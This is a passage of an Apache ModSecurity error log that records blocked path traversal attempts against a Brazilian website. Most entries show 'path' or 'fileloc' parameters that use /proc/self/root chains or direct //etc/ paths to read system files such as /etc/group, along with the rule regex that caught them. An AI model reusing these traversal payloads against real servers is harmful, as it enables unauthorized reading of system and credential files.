"/"] [unique_id "ab1NljJ3M9BSuKP7CAZDwQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:27.760358 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:55308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nl9a6ubjKNq_cu4b6gwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:31.164720 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:55310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NmzJ3M9BSuKP7CAZDzgAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:33.462178 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:55324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nnda6ubjKNq_cu4b6jwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:36.166949 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:55330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NoNa6ubjKNq_cu4b6mAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:38.816601 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:53054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NoQF0L0L-SsrnPo6KQgAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:38.817172 2026] [:error] [pid 7893:tid 140411666392832] [client 57.141.18.56:58384] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NohCii7xarUs8iHaLggAAAgk"]
[Fri Mar 20 10:37:40.414988 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:53062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NpDJ3M9BSuKP7CAZD1wAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:40.785577 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:35342] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:37:41.671211 2026] [:error] [pid 21219:tid 140411582465792] [client 57.141.18.64:58442] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NpfXLqtnMIWvjpaK8BAAAApM"]
[Fri Mar 20 10:37:43.223666 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:53066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Np-oXxyEfFpUF8f-hfAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:48.503225 2026] [:error] [pid 7893:tid 140411741927168] [client 216.73.216.191:59030] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/posix/etc/gmt 1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NrBCii7xarUs8iHaLigAAAgA"]
[Fri Mar 20 10:37:54.055230 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.241.31:53072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nsrninkcc-iUj5Ap-jgAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:56.430770 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:52048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NtBCii7xarUs8iHaLkQAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:58.142048 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:51844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ntda6ubjKNq_cu4b6wQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:58.387632 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.69:59614] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NtgF0L0L-SsrnPo6KXgAAAs4"]
[Fri Mar 20 10:38:01.408725 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.68:59726] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NufHIg5MgXLBnicMXIwAAAdg"]
[Fri Mar 20 10:38:02.673890 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:51860] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NuvqxLDW4GITHUkQK7AAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:38:03.995053 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:51862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nu9a6ubjKNq_cu4b6yAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:38:06.239588 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.0:60022] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NvvXLqtnMIWvjpaK8IAAAApQ"]
[Fri Mar 20 10:38:10.974374 2026] [mime_magic:error] [pid 11167:tid 140411599251200] (70014)End of file found: [client 57.141.18.41:60330] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:38:17.721197 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.241.31:51872] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NyfqxLDW4GITHUkQLBgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:38:23.145660 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:45018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nz-oXxyEfFpUF8f-hqwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:38:36.781092 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:57204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1N3BCii7xarUs8iHaLyAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:38:46.847741 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.55:33426] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1N5fqxLDW4GITHUkQLDwAAAQg"]
[Fri Mar 20 10:38:47.449797 2026] [mime_magic:error] [pid 10189:tid 140411548894976] (70014)End of file found: [client 57.141.18.68:33486] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:38:50.260339 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:44762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1N6hCii7xarUs8iHaL0gAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:38:52.529902 2026] [:error] [pid 21219:tid 140411699963648] [client 57.141.18.68:33618] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id 